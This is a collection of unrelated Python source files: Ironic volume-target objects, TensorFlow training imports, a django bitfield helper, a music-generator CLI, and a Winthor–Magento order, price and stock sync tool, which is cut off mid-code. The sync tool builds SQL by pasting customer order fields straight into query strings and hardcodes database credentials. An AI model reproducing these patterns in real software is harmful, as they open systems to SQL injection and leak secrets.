exists with the same node ID and boot index
:raises: VolumeTargetAlreadyExists if a volume target with the same
UUID exists
"""
values = self.do_version_changes_for_db()
db_target = self.dbapi.create_volume_target(values)
self._from_db_object(self._context, self, db_target)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def destroy(self, context=None):
"""Delete the VolumeTarget from the DB.
:param context: security context. NOTE: This should only
be used internally by the indirection_api.
Unfortunately, RPC requires context as the first
argument, even though we don't use it.
A context should be set when instantiating the
object, e.g.: VolumeTarget(context).
:raises: VolumeTargetNotFound if the volume target cannot be found
"""
self.dbapi.destroy_volume_target(self.uuid)
self.obj_reset_changes()
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def save(self, context=None):
"""Save updates to this VolumeTarget.
Updates will be made column by column based on the result
of self.do_version_changes_for_db().
:param context: security context. NOTE: This should only
be used internally by the indirection_api.
Unfortunately, RPC requires context as the first
argument, even though we don't use it.
A context should be set when instantiating the
object, e.g.: VolumeTarget(context).
:raises: InvalidParameterValue if the UUID is being changed
:raises: VolumeTargetBootIndexAlreadyExists if a volume target already
exists with the same node ID and boot index values
:raises: VolumeTargetNotFound if the volume target cannot be found
"""
updates = self.do_version_changes_for_db()
updated_target = self.dbapi.update_volume_target(self.uuid, updates)
self._from_db_object(self._context, self, updated_target)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def refresh(self, context=None):
"""Loads updates for this VolumeTarget.
Load a volume target with the same UUID from the database
and check for updated attributes. If there are any updates,
they are applied from the loaded volume target, column by column.
:param context: security context. NOTE: This should only
be used internally by the indirection_api.
Unfortunately, RPC requires context as the first
argument, even though we don't use it.
A context should be set when instantiating the
object, e.g.: VolumeTarget(context).
:raises: VolumeTargetNotFound if the volume target cannot be found
"""
current = self.get_by_uuid(self._context, uuid=self.uuid)
self.obj_refresh(current)
self.obj_reset_changes()
@base.IronicObjectRegistry.register
class VolumeTargetCRUDNotification(notification.NotificationBase):
"""Notification emitted at CRUD of a volume target."""
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': object_fields.ObjectField('VolumeTargetCRUDPayload')
}
@base.IronicObjectRegistry.register
class VolumeTargetCRUDPayload(notification.NotificationPayloadBase):
# Version 1.0: Initial Version
VERSION = '1.0'
SCHEMA = {
'boot_index': ('target', 'boot_index'),
'extra': ('target', 'extra'),
'properties': ('target', 'properties'),
'volume_id': ('target', 'volume_id'),
'volume_type': ('target', 'volume_type'),
'created_at': ('target', 'created_at'),
'updated_at': ('target', 'updated_at'),
'uuid': ('target', 'uuid'),
}
fields = {
'boot_index': object_fields.IntegerField(nullable=True),
'extra': object_fields.FlexibleDictField(nullable=True),
'node_uuid': object_fields.UUIDField(),
'properties': object_fields.FlexibleDictField(nullable=True),
'volume_id': object_fields.StringField(nullable=True),
'volume_type': object_fields.StringField(nullable=True),
'created_at': object_fields.DateTimeField(nullable=True),
'updated_at': object_fields.DateTimeField(nullable=True),
'uuid': object_fields.UUIDField(),
}
def __init__(self, target, node_uuid):
super(VolumeTargetCRUDPayload, self).__init__(node_uuid=node_uuid)
self.populate_schema(target=target)
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training and input utilities.
See
[Contrib Training](https://tensorflow.org/api_guides/python/contrib.training)
guide.
@@batch_sequences_with_states
@@NextQueuedSequenceBatch
@@SequenceQueueingStateSaver
@@rejection_sample
@@resample_at_rate
@@stratified_sample
@@weighted_resample
@@bucket
@@bucket_by_sequence_length
@@RandomStrategy
@@GreedyLoadBalancingStrategy
@@byte_size_load_fn
@@FailureTolerator
@@HParams
@@HParamDef
@@parse_values
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import
from tensorflow.contrib.training.python.training.bucket_ops import *
from tensorflow.contrib.training.python.training.device_setter import *
from tensorflow.contrib.training.python.training.evaluation import checkpoints_iterator
from tensorflow.contrib.training.python.training.evaluation import evaluate_once
from tensorflow.contrib.training.python.training.evaluation import evaluate_repeatedly
from tensorflow.contrib.training.python.training.evaluation import get_or_create_eval_step
from tensorflow.contrib.training.python.training.evaluation import StopAfterNEvalsHook
from tensorflow.contrib.training.python.training.evaluation import SummaryAtEndHook
from tensorflow.contrib.training.python.training.evaluation import wait_for_new_checkpoint
from tensorflow.contrib.training.python.training.feeding_queue_runner import FeedingQueueRunner
from tensorflow.contrib.training.python.training.hparam import *
from tensorflow.contrib.training.python.training.resample import *
from tensorflow.contrib.training.python.training.sampling_ops import *
from tensorflow.contrib.training.python.training.sequence_queueing_state_saver import *
from tensorflow.contrib.training.python.training.tensor_queue_dataset import enqueue_in_queue_dataset
from tensorflow.contrib.training.python.training.tensor_queue_dataset import prepend_from_queue_and_padded_batch_dataset
from tensorflow.contrib.training.python.training.training import add_gradients_summaries
from tensorflow.contrib.training.python.training.training import clip_gradient_norms
from tensorflow.contrib.training.python.training.training import clip_gradient_norms_fn
from tensorflow.contrib.training.python.training.training import create_train_op
from tensorflow.contrib.training.python.training.training import multiply_gradients
from tensorflow.contrib.training.python.training.training import train
from tensorflow.contrib.training.python.training.tuner import Tuner
# pylint: enable=unused-import,wildcard-import
from tensorflow.python.util.all_util import remove_undocumented
# Allow explicitly imported symbols. Symbols imported with * must also be
# whitelisted here or in the module docstring above.
_allowed_symbols = [
'checkpoints_iterator', 'evaluate_once', 'evaluate_repeatedly',
'FeedingQueueRunner', 'get_or_create_eval_step', 'StopAfterNEvalsHook',
'SummaryAtEndHook', 'wait_for_new_checkpoint', 'add_gradients_summaries',
'clip_gradient_norms', 'clip_gradient_norms_fn', 'create_train_op',
'multiply_gradients', 'enqueue_in_queue_dataset',
'prepend_from_queue_and_padded_batch_dataset', 'train']
remove_undocumented(__name__, _allowed_symbols)
|
from __future__ import absolute_import
from six import string_types
def cmp(a, b):
return (a > b) - (a < b)
class Bit(object):
"""
Represents a single Bit.
"""
def __init__(self, number, is_set=True):
self.number = number
self.is_set = bool(is_set)
self.mask = 2 ** int(number)
self.children = []
if not self.is_set:
self.mask = ~self.mask
def __repr__(self):
return '<%s: number=%d, is_set=%s>' % (self.__class__.__name__, self.number, self.is_set)
# def __str__(self):
# if self.is_set:
# return 'Yes'
# return 'No'
def __int__(self):
return self.mask
def __bool__(self):
return self.is_set
__nonzero__ = __bool__
def __eq__(self, value):
if isinstance(value, Bit):
return value.number == self.number and value.is_set == self.is_set
elif isinstance(value, bool):
return value == self.is_set
elif isinstance(value, int):
return value == self.mask
return value == self.is_set
def __ne__(self, value):
return not self == value
def __coerce__(self, value):
return (self.is_set, bool(value))
def __invert__(self):
return self.__class__(self.number, not self.is_set)
def __and__(self, value):
if isinstance(value, Bit):
value = value.mask
return value & self.mask
def __rand__(self, value):
if isinstance(value, Bit):
value = value.mask
return self.mask & value
def __or__(self, value):
if isinstance(value, Bit):
value = value.mask
return value | self.mask
def __ror__(self, value):
if isinstance(value, Bit):
value = value.mask
return self.mask | value
def __lshift__(self, value):
if isinstance(value, Bit):
value = value.mask
return value << self.mask
def __rlshift__(self, value):
if isinstance(value, Bit):
value = value.mask
return self.mask << value
def __rshift__(self, value):
if isinstance(value, Bit):
value = value.mask
return value >> self.mask
def __rrshift__(self, value):
if isinstance(value, Bit):
value = value.mask
return self.mask >> value
def __xor__(self, value):
if isinstance(value, Bit):
value = value.mask
return value ^ self.mask
def __rxor__(self, value):
if isinstance(value, Bit):
value = value.mask
return self.mask ^ value
def __sentry__(self):
return repr(self)
def evaluate(self, evaluator, qn, connection):
return self.mask, []
def prepare(self, evaluator, query, allow_joins):
return evaluator.prepare_node(self, query, allow_joins)
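# A small usage sketch of the Bit mask semantics (illustrative values, not part of
# the original module): a set bit number n carries mask 2**n, an unset bit carries
# the bitwise complement of that mask, and Bit | Bit combines the masks.
assert int(Bit(3)) == 8
assert int(Bit(3, is_set=False)) == ~8
assert (Bit(0) | Bit(1)) == 3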
class BitHandler(object):
"""
Represents an array of bits, each as a ``Bit`` object.
"""
def __init__(self, value, keys, labels=None):
# TODO: change to bitarray?
if value:
self._value = int(value)
else:
self._value = 0
self._keys = keys
self._labels = labels is not None and labels or keys
def __eq__(self, other):
if not isinstance(other, BitHandler):
return False
return self._value == other._value
def __lt__(self, other):
return int(self._value) < other
def __le__(self, other):
return int(self._value) <= other
def __gt__(self, other):
return int(self._value) > other
def __ge__(self, other):
return int(self._value) >= other
def __cmp__(self, other):
return cmp(self._value, other)
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, ', '.join('%s=%s' % (k, self.get_bit(n).is_set) for n, k in enumerate(self._keys)),)
def __str__(self):
return str(self._value)
def __int__(self):
return self._value
def __bool__(self):
return bool(self._value)
__nonzero__ = __bool__
def __and__(self, value):
return BitHandler(self._value & int(value), self._keys)
def __or__(self, value):
return BitHandler(self._value | int(value), self._keys)
def __add__(self, value):
return BitHandler(self._value + int(value), self._keys)
def __sub__(self, value):
return BitHandler(self._value - int(value), self._keys)
def __lshift__(self, value):
return BitHandler(self._value << int(value), self._keys)
def __rshift__(self, value):
return BitHandler(self._value >> int(value), self._keys)
def __xor__(self, value):
return BitHandler(self._value ^ int(value), self._keys)
def __contains__(self, key):
bit_number = self._keys.index(key)
return bool(self.get_bit(bit_number))
def __getattr__(self, key):
if key.startswith('_'):
return object.__getattribute__(self, key)
if key not in self._keys:
raise AttributeError('%s is not a valid flag' % key)
return self.get_bit(self._keys.index(key))
def __setattr__(self, key, value):
if key.startswith('_'):
return object.__setattr__(self, key, value)
if key not in self._keys:
raise AttributeError('%s is not a valid flag' % key)
self.set_bit(self._keys.index(key), value)
def __iter__(self):
return self.iteritems()
def __sentry__(self):
return repr(self)
def _get_mask(self):
return self._value
mask = property(_get_mask)
def evaluate(self, evaluator, qn, connection):
return self.mask, []
def get_bit(self, bit_number):
mask = 2 ** int(bit_number)
return Bit(bit_number, self._value & mask != 0)
def set_bit(self, bit_number, true_or_false):
mask = 2 ** int(bit_number)
if true_or_false:
self._value |= mask
else:
self._value &= (~mask)
return Bit(bit_number, self._value & mask != 0)
def keys(self):
return self._keys
def iterkeys(self):
return iter(self._keys)
def items(self):
return list(self.iteritems())
def iteritems(self):
for k in self._keys:
yield (k, getattr(self, k).is_set)
def get_label(self, flag):
if isinstance(flag, string_types):
flag = self._keys.index(flag)
if isinstance(flag, Bit):
flag = flag.number
return self._labels[flag]
import django
if django.VERSION[:2] >= (1, 8):
from django.core.exceptions import ImproperlyConfigured
# We need to register adapters in Django 1.8 in order to prevent
# "ProgrammingError: can't adapt type"
try:
from django.db.backends.sqlite3.base import Database
Database.register_adapter(Bit, lambda x: int(x))
Database.register_adapter(BitHandler, lambda x: int(x))
except ImproperlyConfigured:
pass
try:
from django.db.backends.postgresql.base import Database
Database.extensions.register_adapter(Bit, lambda x: Database.extensions.AsIs(int(x)))
Database.extensions.register_adapter(BitHandler, lambda x: Database.extensions.AsIs(int(x)))
except ImproperlyConfigured:
pass
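# A minimal usage sketch for BitHandler (the flag names below are arbitrary
# examples, not part of the original module): flags are stored as bits of a single
# integer and exposed as named attributes.
if __name__ == '__main__':
    flags = BitHandler(0, ['is_active', 'is_staff'])
    flags.is_active = True
    assert bool(flags.is_active) and not bool(flags.is_staff)
    assert int(flags) == 1
    assert dict(flags.items()) == {'is_active': True, 'is_staff': False}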
|
"""
usage: generator <input-file> [<method>] [--midi=FILE|--timed-play]
                 [--timed-play-input|--play-input] [--markov-order=INT]
example:
python -m generator mymusic.tsv --midi=mymusic.mid
"""
import csv
import docopt
from generator import generator
from generator import classifier
from generator import music_player
INPUT_DELIM = '\t'
def notes_from_file(filename:str, delimiter:str=INPUT_DELIM) -> iter:
"""Yield pairs (millisecond, note) found in given file.
Given file should be a DSV file with delimiter `delimiter`,
and expose two values per lines, millisecond and note.
"""
with open(filename) as fd:
yield from ((int(note), int(ms))
for ms, note in csv.reader(fd, delimiter=delimiter))
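# A self-contained sketch of the expected input format (the file content below is
# made up for illustration): two tab-separated columns, millisecond then note,
# which notes_from_file yields back as (note, millisecond) pairs.
def _demo_notes_from_file():
    import os
    import tempfile
    rows = "0\t60\n500\t62\n1000\t64\n"
    with tempfile.NamedTemporaryFile('w', suffix='.tsv', delete=False) as tmp:
        tmp.write(rows)
        path = tmp.name
    try:
        assert list(notes_from_file(path)) == [(60, 0), (62, 500), (64, 1000)]
    finally:
        os.remove(path)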
if __name__ == "__main__":
args = docopt.docopt(__doc__)
markov_order = int(args['--markov-order'] or 3)
assert markov_order >= 1, "Markov chain order should be >= 1"
gen_method = generator.get_method(args['<method>'] or 'DI')
notes, mss = (zip(*tuple(notes_from_file(args['<input-file>']))))
if args['--play-input'] or args['--timed-play-input']:
print('PLAYING INPUT MUSIC…')
player = music_player.play if args['--play-input'] else music_player.timed_play
player(zip(notes, mss))
CLASSIF_K, SPEED = 6, 0.07
classif = classifier.clusterizer_by(CLASSIF_K)
classif_value = {c: (idx*2)*SPEED for idx, c in enumerate(range(CLASSIF_K), start=1)}
#gen = gen_method(notes, mss, time_classifier=classif, note_number=100)
gen = gen_method(notes, mss, time_classifier=classif, note_number=200,
note_chain_order=markov_order, time_chain_order=markov_order)
if args['--midi']:
print('Midi file {} will be overwritten.'.format(args['--midi']))
music_player.midi_writer(gen, classif_value,
midi_filename=args['--midi'])
else:
print('PLAYING GENERATED MUSIC…')
    if args['--timed-play']:
        music_player.timed_play(gen, classif_value)
    else:  # play it without the timer
        music_player.play(gen, classif_value)
|
# coding: utf-8
from base import *
from PySide import QtGui, QtCore
import sys
import time
import requests
import xmltodict
import xml.etree.ElementTree as ET
import math
import json
from datetime import datetime, date, timedelta
from collections import OrderedDict
from magento import Magento
import traceback
class Routine9813(WinthorRoutine):
def __init__(self, *args):
# super(WinthorRoutine, self).__init__('TESTE')
print(args)
super(Routine9813, self).__init__(args[4] or 9813, u'Integração e-commerce', *args)
self.initUI()
self.initWorkers()
def initWorkers(self):
self.priceWorker = PriceWorker()
self.priceWorker.updateProgress.connect(self.setPriceProgress)
self.priceWorker.start()
self.stockWorker = StockWorker()
self.stockWorker.updateProgress.connect(self.setStockProgress)
self.stockWorker.start()
self.ordersWorker = OrdersWorker()
self.ordersWorker.updateProgress.connect(self.setOrdersProgress)
self.ordersWorker.start()
def initUI(self):
super(Routine9813, self).initUI()
self.tabControl = QtGui.QTabWidget(self)
self.mainwindow.addWidget(self.tabControl)
self.priceTab = QtGui.QWidget()
self.stockTab = QtGui.QWidget()
self.ordersTab = QtGui.QWidget()
self.tabControl.addTab(self.priceTab,u"Preço")
self.tabControl.addTab(self.stockTab,u"Estoque")
self.tabControl.addTab(self.ordersTab,u"Pedidos")
self.priceTabUI()
self.stockTabUI()
self.ordersTabUI()
def priceTabUI(self):
self.priceProgressBar = QtGui.QProgressBar(self)
self.priceProgressBar.setGeometry(QtCore.QRect(20, 10, 361, 23))
self.priceProgressBar.setProperty("value", 24)
self.priceProgressBar.setObjectName("priceProgressBar")
self.priceLog = QtGui.QTextEdit(self)
row = QtGui.QHBoxLayout()
row.addWidget(QtGui.QLabel("Progresso:"))
row.addWidget(self.priceProgressBar)
self.priceStopButton = QtGui.QPushButton('Parar', self)
self.priceStopButton.setEnabled(False)
self.priceStopButton.clicked.connect(self.togglePriceWorker)
self.priceRestartButton = QtGui.QPushButton('Reiniciar', self)
self.priceRestartButton.setEnabled(False)
self.priceRestartButton.clicked.connect(self.resetPriceWorker)
buttonRow = QtGui.QHBoxLayout()
buttonRow.addStretch(1)
buttonRow.addWidget(self.priceStopButton)
buttonRow.addWidget(self.priceRestartButton)
layout = QtGui.QVBoxLayout()
layout.addLayout(row)
layout.addWidget(self.priceLog)
layout.addLayout(buttonRow)
self.priceTab.setLayout(layout)
def stockTabUI(self):
self.stockProgressBar = QtGui.QProgressBar(self)
self.stockProgressBar.setGeometry(QtCore.QRect(20, 10, 361, 23))
self.stockProgressBar.setProperty("value", 24)
self.stockProgressBar.setObjectName("stockProgressBar")
self.stockLog = QtGui.QTextEdit(self)
row = QtGui.QHBoxLayout()
row.addWidget(QtGui.QLabel("Progresso:"))
row.addWidget(self.stockProgressBar)
self.stockStopButton = QtGui.QPushButton('Parar', self)
self.stockStopButton.setEnabled(False)
self.stockStopButton.clicked.connect(self.toggleStockWorker)
self.stockRestartButton = QtGui.QPushButton('Reiniciar', self)
self.stockRestartButton.setEnabled(False)
self.stockRestartButton.clicked.connect(self.resetStockWorker)
buttonRow = QtGui.QHBoxLayout()
buttonRow.addStretch(1)
buttonRow.addWidget(self.stockStopButton)
buttonRow.addWidget(self.stockRestartButton)
layout = QtGui.QVBoxLayout()
layout.addLayout(row)
layout.addWidget(self.stockLog)
layout.addLayout(buttonRow)
self.stockTab.setLayout(layout)
def ordersTabUI(self):
self.ordersProgressBar = QtGui.QProgressBar(self)
self.ordersProgressBar.setGeometry(QtCore.QRect(20, 10, 361, 23))
self.ordersProgressBar.setProperty("value", 24)
self.ordersProgressBar.setObjectName("ordersProgressBar")
self.ordersHeader = [u'Integração', u'Num. pedido', u'Comprado Em', u'Status', u'Cliente', u'CPF/CNPJ', u'Items', u'Total', u'CEP', u'CODCLI', u'CODENDENTCLI', u'NUMPED']
self.ordersTable = QtGui.QTableView(self)
self.ordersTable.setModel(QTableModel(self, [[]], self.ordersHeader))
row = QtGui.QHBoxLayout()
row.addWidget(QtGui.QLabel("Progresso:"))
row.addWidget(self.ordersProgressBar)
layout = QtGui.QVBoxLayout()
layout.addLayout(row)
layout.addWidget(self.ordersTable)
self.ordersTab.setLayout(layout)
def setPriceProgress(self, progress, log):
self.priceProgressBar.setValue(progress)
self.priceLog.append(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ': ' + log)
cursor = self.priceLog.textCursor()
cursor.movePosition(QtGui.QTextCursor.End)
self.priceLog.setTextCursor(cursor)
def togglePriceWorker(self):
self.priceWorker.toggle()
if self.priceWorker.isRunning:
self.tabControl.setTabText(0, u'Preço')
self.priceStopButton.setText('Parar')
else:
self.tabControl.setTabText(0, u'Preço (parado)')
self.priceStopButton.setText('Continuar')
def resetPriceWorker(self):
self.priceWorker.reset()
self.tabControl.setTabText(0, u'Preço')
self.priceStopButton.setText('Parar')
def setStockProgress(self, progress, log):
self.stockProgressBar.setValue(progress)
self.stockLog.append(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + ': ' + log)
cursor = self.stockLog.textCursor()
cursor.movePosition(QtGui.QTextCursor.End)
self.stockLog.setTextCursor(cursor)
def toggleStockWorker(self):
self.stockWorker.toggle()
if self.stockWorker.isRunning:
self.tabControl.setTabText(1, u'Estoque')
self.stockStopButton.setText('Parar')
else:
self.tabControl.setTabText(1, u'Estoque (parado)')
self.stockStopButton.setText('Continuar')
def resetStockWorker(self):
self.stockWorker.reset()
self.tabControl.setTabText(1, u'Estoque')
self.stockStopButton.setText('Parar')
def setOrdersProgress(self, progress, ordersData):
self.ordersProgressBar.setValue(progress)
data = json.loads(ordersData)
self.ordersTable.setModel(QTableModel(self, data, self.ordersHeader))
def closeEvent(self, event):
self.priceWorker.finish()
self.stockWorker.finish()
self.ordersWorker.finish()
event.accept()
class PriceWorker(QtCore.QThread):
updateProgress = QtCore.Signal(int, str)
def __init__(self):
QtCore.QThread.__init__(self)
self.reset()
def run(self):
while True:
try:
self.reset()
self.updateProgress.emit(0, 'Progress: ' + str(0) + '%.')
# Get Winthor data
self.updateProgress.emit(0, 'Searching product prices on Winthor...')
w = Winthor()
winthor_products = w.getPrices()
winthor_sku_to_price = dict([(p['codigo_produto'], p['preco_venda']) for p in winthor_products])
self.updateProgress.emit(4, 'Found ' + str(len(winthor_products)) + ' product prices on Winthor!')
self.updateProgress.emit(4, 'Progress: ' + str(4) + '%.')
# Get Magento data
self.updateProgress.emit(4, 'Connecting to Magento platform...')
magento = Magento()
self.updateProgress.emit(13, 'Connected!')
self.updateProgress.emit(13, 'Progress: ' + str(13) + '%.')
self.updateProgress.emit(13, 'Searching products on Magento...')
magento_products = sorted(
[p for p in magento.getProducts() if p['sku'].isdigit()],
key=lambda p: int(p['sku'])
)
self.updateProgress.emit(23, 'Found ' + str(len(magento_products)) + ' products on Magento!')
# Update magento data
steps = len(magento_products)
for i, magento_product in enumerate(magento_products):
self.updateProgress.emit(23 + i*77.0/steps, 'Progress: ' + str(23 + i*77.0/steps) + '%.')
old_price = round(float(magento.getProductPrice(magento_product['sku'])['price']), 2)
new_price = round(float(winthor_sku_to_price[magento_product['sku']]), 2)
if old_price == new_price: continue
self.updateProgress.emit(23 + i*77.0/steps, 'Updating price on item #%s from %s to %s...' % (magento_product['sku'], old_price, new_price))
magento.setProductPrice({
'sku': magento_product['sku'],
'product_id': magento_product['product_id'],
'price': str(new_price),
'old_price': old_price,
})
self.updateProgress.emit(100, 'Progress: ' + str(100) + '%.')
self.updateProgress.emit(100, '=========================')
self.updateProgress.emit(100, '')
self.updateProgress.emit(100, '')
self.reset()
except Exception as e:
self.updateProgress.emit(0, 'Error: %s' % str(e).encode('utf-8'))
self.updateProgress.emit(100, '=========================')
self.updateProgress.emit(100, '')
self.updateProgress.emit(100, '')
def toggle(self):
self.isRunning = not self.isRunning
def reset(self):
self.isRunning = True
self.iteration = 0
def finish(self):
self.terminate()
class StockWorker(QtCore.QThread):
updateProgress = QtCore.Signal(int, str)
def __init__(self):
QtCore.QThread.__init__(self)
self.reset()
def run(self):
while True:
try:
self.reset()
self.updateProgress.emit(0, 'Progress: ' + str(0) + '%.')
# Get Winthor data
self.updateProgress.emit(0, 'Searching product quantities on Winthor...')
w = Winthor()
winthor_products = w.getQuantities()
winthor_products_skus = [p['codigo_produto'] for p in winthor_products]
self.updateProgress.emit(4, 'Found ' + str(len(winthor_products)) + ' product quantities on Winthor!')
self.updateProgress.emit(4, 'Progress: ' + str(4) + '%.')
# Get Magento data
self.updateProgress.emit(4, 'Connecting to Magento platform...')
magento = Magento()
self.updateProgress.emit(13, 'Connected!')
self.updateProgress.emit(13, 'Progress: ' + str(13) + '%.')
self.updateProgress.emit(13, 'Searching product quantities on Magento...')
magento_products = magento.getProductQuantities(winthor_products_skus)
magento_sku_to_qty = dict([(p['sku'], p['qty']) for p in magento_products])
magento_sku_to_id = dict([(p['sku'], p['product_id']) for p in magento_products])
self.updateProgress.emit(23, 'Found ' + str(len(magento_products)) + ' product quantities on Magento!')
self.updateProgress.emit(23, 'Progress: ' + str(23) + '%.')
# Update Magento data
products_qty = sorted([
{
'product_id': magento_sku_to_id[q['codigo_produto']],
'sku': q['codigo_produto'],
'qty': int(q['quantidade_disponivel']),
'old_qty': int(float(magento_sku_to_qty[q['codigo_produto']]))
}
for q in winthor_products
if q['codigo_produto'] in magento_sku_to_id
and float(q['quantidade_disponivel']) != float(magento_sku_to_qty[q['codigo_produto']])
], key=lambda p: p['sku'])
self.updateProgress.emit(23, 'Preparing to update ' + str(len(products_qty)) + ' products on Magento...')
STEP = 100.0
steps = int(math.ceil(len(products_qty)/STEP))
for i in range(steps):
prods = products_qty[int(i*STEP):int(i*STEP+STEP)]
magento.setProductQuantities(prods)
self.updateProgress.emit(23 + (i+1)*77.0/steps, 'Progress: ' + str(23 + (i+1)*77.0/steps) + '%.')
self.updateProgress.emit(23 + (i+1)*77.0/steps, 'Updated ' + str(len(prods)) + ' products on Magento!')
self.updateProgress.emit(100, 'Progress: ' + str(100) + '%.')
self.updateProgress.emit(100, '=========================')
self.updateProgress.emit(100, '')
self.updateProgress.emit(100, '')
except Exception as e:
self.updateProgress.emit(0, 'Error: %s' % str(e).encode('utf-8'))
self.updateProgress.emit(100, '=========================')
self.updateProgress.emit(100, '')
self.updateProgress.emit(100, '')
def toggle(self):
self.isRunning = not self.isRunning
def reset(self):
self.isRunning = True
self.iteration = 0
def finish(self):
self.terminate()
class OrdersWorker(QtCore.QThread):
updateProgress = QtCore.Signal(int, str)
def __init__(self):
QtCore.QThread.__init__(self)
def run(self):
db = DatabaseAdapter(user='PAPELEXTESTE', password='PAPELEXTESTE', alias='TESTE')
orders = {}
self.updateProgress.emit(50, json.dumps([[]]))
while True:
try:
self.reset()
m = Magento()
response = m.getOrders(today=True)
result = dict([(order['increment_id'], order) for order in response])
for key in result:
if key in orders:
orders[key].update(result[key])
else:
orders[key] = result[key]
for order_id, order in orders.iteritems():
print orders.keys()
print order['increment_id'], order.get('integration')
# print m.getOrder(order['increment_id'])
if 'integration' not in order or order.get('integration') == '':
# check PCCLIENTFV
query = "select count(*) COUNT from PCCLIENTFV where CGCENT = '" + order['customer_taxvat'] + "'"
print query
count = db.query(query)[0]['count']
if count == 0:
today = date.today().strftime('%Y-%m-%d')
query = '''
insert into PCCLIENTFV (IMPORTADO,TIPOOPERACAO,CGCENT,CLIENTE,IEENT,TELENT,CEPENT,CODUSUR1,CODPRACA,OBS,EMAIL,OBSERVACAO_PC,DTINCLUSAO,CODCLI,DTALTERACAO,DTNASC)
values
(
9, -- IMPORTADO
'I', -- TIPOOPERACAO
'%s', -- CGCENT
'%s', -- CLIENTE
'ISENTO', -- IEENT
'%s', -- TELENT
'%s', -- CEPENT
2236, -- CODUSUR1
999999, -- CODPRACA
'P', -- OBS
'%s', -- EMAIL
'Pedido Site %s', -- OBSERVACAO_PC
to_date('%s', 'YYYY-MM-DD'), -- DTINCLUSAO
null, -- CODCLI
to_date('%s', 'YYYY-MM-DD'), -- DTALTERACAO
to_date('%s','YYYY-MM-DD') -- DTNASC
)
''' % (order['customer_taxvat'], order['billing_name'], order['telephone'][-13:],
order['postcode'], order['customer_email'], order['increment_id'], today, today,
order['customer_dob'][:10] if 'customer_dob' in order else '1900-01-01')
print query
db.execute(query)
order['integration'] = 'Efetivar Pre-cadastro'
if order['integration'] == 'Efetivar Pre-cadastro':
# check PCCLIENT
query = "select count(*) count from PCCLIENT where regexp_replace(CGCENT, '[^0-9]', '') = '" + order['customer_taxvat'] + "'"
print query
count = db.query(query)[0]['count']
if count > 0:
query = "select max(codcli) codcli from PCCLIENT where regexp_replace(CGCENT, '[^0-9]', '') = '" + order['customer_taxvat'] + "'"
print query
codcli = db.query(query)[0]['codcli']
order['CODCLI'] = codcli
order['integration'] = 'Endereço pendente'
if order['integration'] == 'Endereço pendente':
# check Address on PCCLIENT
query = '''
select CODCLI
from PCCLIENT
where regexp_replace(CGCENT, '[^0-9]', '') = '%s'
and regexp_replace(CEPENT, '[^0-9]', '') = '%s'
''' % (order['customer_taxvat'], order['postcode'].replace('-', ''))
print query
result = db.query(query)
if len(result) > 0:
order['CODCLI'] = result[0]['codcli']
order['CODENDENTCLI'] = 'Cliente'
order['integration'] = 'Pedido pendente'
# check Address on PCCLIENTENDENT
query = '''
select PCCLIENT.CODCLI, CODENDENTCLI
from PCCLIENTENDENT, PCCLIENT
where PCCLIENTENDENT.CODCLI = PCCLIENT.CODCLI
and regexp_replace(PCCLIENT.CGCENT, '[^0-9]', '') = '%s'
and regexp_replace(PCCLIENTENDENT.CEPENT, '[^0-9]', '') = '%s'
''' % (order['customer_taxvat'], order['postcode'].replace('-', ''))
print query
result = db.query(query)
if len(result) > 0:
order['CODENDENTCLI'] = result[0]['codendentcli']
order['CODCLI'] = result[0]['codcli']
order['integration'] = 'Pedido pendente'
if order['integration'] == 'Pedido criado' or order['integration'].startswith('Pedido rejeitado') or order['integration'] == 'Pedido pendente':
query = '''
select 1
from PCPEDCFV
where NUMPEDRCA = '%s'
''' % (order['increment_id'])
print query
result = db.query(query)
if len(result) == 0:
# check PCPEDCFV
query = '''
insert into PCPEDCFV (IMPORTADO, NUMPEDRCA, CODUSUR, CGCCLI, DTABERTURAPEDPALM, DTFECHAMENTOPEDPALM, CODFILIAL, CODCOB, CODPLPAG, CONDVENDA, ORIGEMPED)
values
(
1, -- IMPORTADO
'%s', -- NUMPEDRCA
1, -- CODUSUR
'%s', -- CGCCLI
to_date('%s', 'YYYY-MM-DD'), -- DTABERTURAPEDPALM
to_date('%s', 'YYYY-MM-DD'), -- DTFECHAMENTOPEDPALM
1, -- CODFILIAL
'D', -- CODCOB
1, -- CODPLPAG
1, -- CONDVENDA
'F' -- ORIGEMPED
)
''' % (order['increment_id'], order['customer_taxvat'], order['created_at'][:10],
order['created_at'][:10])
print query
db.execute(query)
full_order = m.getOrder(order['increment_id'])
query_products = [
" select %s, 1, '%s', to_date('%s', 'YYYY-MM-DD'), %s, %s, %s, %s from dual " % (
order['increment_id'], order['customer_taxvat'], order['created_at'][:10],
item['sku'], item['qty_ordered'], item['price'], index+1
)
for index, item in enumerate(full_order['items'])
]
query = '''
insert into PCPEDIFV (NUMPEDRCA,CODUSUR,CGCCLI,DTABERTURAPEDPALM,CODPROD,QT,PVENDA,NUMSEQ)
%s
''' % ' union all '.join(query_products)
print query
db.execute(query)
order['integration'] = 'Pedido criado'
query = '''
select IMPORTADO, observacao_pc
from PCPEDCFV
where NUMPEDRCA = '%s'
''' % (order['increment_id'])
print query
result = db.query(query)[0]
query = '''
select observacao_pc
from PCPEDIFV
where NUMPEDRCA = '%s'
''' % (order['increment_id'])
print query
result_items = db.query(query)
if result['importado'] == 2:
order['integration'] = 'OK'
elif result['importado'] == 3:
